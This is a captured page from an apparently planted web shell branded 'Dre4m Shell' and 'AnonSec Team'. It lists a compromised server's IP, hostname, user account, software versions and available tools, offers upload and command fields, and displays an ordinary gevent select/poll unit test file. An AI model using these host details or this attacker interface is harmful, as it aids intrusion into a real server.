Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.188.69.167
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests//test__select.py
from gevent.testing import six
import sys
import os
import errno
from gevent import select, socket
import gevent.core
import gevent.testing as greentest
import gevent.testing.timing
import unittest


class TestSelect(gevent.testing.timing.AbstractGenericWaitTestCase):

    def wait(self, timeout):
        select.select([], [], [], timeout)



@greentest.skipOnWindows("Cant select on files")
class TestSelectRead(gevent.testing.timing.AbstractGenericWaitTestCase):

    def wait(self, timeout):
        r, w = os.pipe()
        try:
            select.select([r], [], [], timeout)
        finally:
            os.close(r)
            os.close(w)

    # Issue #12367: http://www.freebsd.org/cgi/query-pr.cgi?pr=kern/155606
    @unittest.skipIf(sys.platform.startswith('freebsd'),
                     'skip because of a FreeBSD bug: kern/155606')
    def test_errno(self):
        # Backported from test_select.py in 3.4
        with open(__file__, 'rb') as fp:
            fd = fp.fileno()
            fp.close()
            try:
                select.select([fd], [], [], 0)
            except OSError as err:
                # Python 3
                self.assertEqual(err.errno, errno.EBADF)
            except select.error as err: # pylint:disable=duplicate-except
                # Python 2 (select.error is OSError on py3)
                self.assertEqual(err.args[0], errno.EBADF)
            else:
                self.fail("exception not raised")


@unittest.skipUnless(hasattr(select, 'poll'), "Needs poll")
@greentest.skipOnWindows("Cant poll on files")
class TestPollRead(gevent.testing.timing.AbstractGenericWaitTestCase):
    def wait(self, timeout):
        # On darwin, the read pipe is reported as writable
        # immediately, for some reason. So we carefully register
        # it only for read events (the default is read and write)
        r, w = os.pipe()
        try:
            poll = select.poll()
            poll.register(r, select.POLLIN)
            poll.poll(timeout * 1000)
        finally:
            poll.unregister(r)
            os.close(r)
            os.close(w)

    def test_unregister_never_registered(self):
        # "Attempting to remove a file descriptor that was
        # never registered causes a KeyError exception to be
        # raised."
        poll = select.poll()
        self.assertRaises(KeyError, poll.unregister, 5)

    @unittest.skipIf(hasattr(gevent.core, 'libuv'),
                     "Depending on whether the fileno is reused or not this either crashes or does nothing."
                     "libuv won't open a watcher for a closed file on linux.")
    def test_poll_invalid(self):
        with open(__file__, 'rb') as fp:
            fd = fp.fileno()

            poll = select.poll()
            poll.register(fd, select.POLLIN)
            # Close after registering; libuv refuses to even
            # create a watcher if it would get EBADF (so this turns into
            # a test of whether or not we successfully initted the watcher).
            fp.close()
            result = poll.poll(0)
            self.assertEqual(result, [(fd, select.POLLNVAL)]) # pylint:disable=no-member

class TestSelectTypes(greentest.TestCase):

    def test_int(self):
        sock = socket.socket()
        try:
            select.select([int(sock.fileno())], [], [], 0.001)
        finally:
            sock.close()

    if hasattr(six.builtins, 'long'):
        def test_long(self):
            sock = socket.socket()
            try:
                select.select(
                    [six.builtins.long(sock.fileno())], [], [], 0.001)
            finally:
                sock.close()

    def test_string(self):
        self.switch_expected = False
        self.assertRaises(TypeError, select.select, ['hello'], [], [], 0.001)


if __name__ == '__main__':
    greentest.main()

Anon7 - 2022
AnonSec Team